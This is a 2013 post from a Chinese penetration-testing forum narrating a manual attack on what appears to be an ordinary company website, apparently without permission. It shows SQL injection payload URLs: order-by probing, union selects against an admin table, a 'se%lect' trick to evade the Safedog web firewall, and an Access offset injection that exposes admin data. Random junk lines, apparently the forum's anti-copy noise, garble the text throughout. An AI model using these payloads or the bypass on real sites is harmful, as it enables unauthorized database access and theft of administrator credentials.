中国网络渗透测试联盟
标题:
一次手工渗透突破安全狗防御+ACCESS偏移注入
[打印本页]
作者:
admin
时间:
2013-3-8 21:49
标题:
一次手工渗透突破安全狗防御+ACCESS偏移注入
打开网站,一个企业站。
+ Q& x. k* \; N
, p7 j7 s3 B4 {% g, O# o
- F. \& w% q. H' S% M; T% h! ~/ E
顺手加个admin
- A. q; E: e. L- `4 [; i! L. J+ a
3 x3 X8 V0 Y# h( ~$ _# S) x
% W+ M3 y- p0 Q) e
默认后台。
: S8 l, Q$ t/ G, m7 t! h
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
; k0 U; X8 }4 g0 N
- B1 f7 y$ c1 c& g& ] T/ o* V" a
' o- D( E3 C1 l7 @
9 x* y2 U! \0 C# W; C, H$ i
所以就不用御剑扫了,待会直接封IP。
$ b6 ^- ?( u4 F' } a: ?
1 {# _* E p: W% s$ J# x j
用order by语句判断是否存在注入。
! A. z# Z9 q2 N" Z8 Q
http://www.xxx.com
/product_show.asp?id=997 order by 1
' @: m' V! o9 ]( B& j
http://www.xxx.com
/product_show.asp?id=997 order by 100
& b) l0 @1 n/ S, J
现在存在注入,经测试后发现是9个字段。
, s2 `0 m& k9 {- S) ]
: G ]# B& z0 K/ a/ e& T
接下来进行联合查询,猜是否存在admin表。
! k0 _6 J. o9 e& y
http://www.xxx.com
/product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
6 L5 Z2 e% k2 w# a8 M7 Y
3 p7 a S; A7 w6 L
" R+ _1 Q } n6 F9 a9 p- n
, v6 N2 n& F2 {
在select中间加个%,se%lect绕过安全狗。
" Q/ K1 g: x a; X7 y
; u# [8 Q2 Y4 g* b
0 R& N6 P4 n& I
发现存在admin表,然后开始手工猜常用的字段。
4 B8 R" i" Z, H1 ^- Z/ @' a
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
/ `+ M0 {! J4 T- B+ f
* w" y, T- J9 E1 F
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
( [1 _0 p1 n- g+ d8 n
0 g j( L5 p, M* M: l G
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
0 h$ N. O* G3 d9 h4 I
http://www.xxx.com
/product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
# f1 q4 j E, b. _0 D# E5 o
好了,敏感内容出显了。
1 f' B. f# @( A8 |* u
/ ~! m- p1 P' N4 u
. h w3 F* j! d# a7 k$ R& g( p: m
?; x- r5 M0 t3 `' q' i" G) c
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2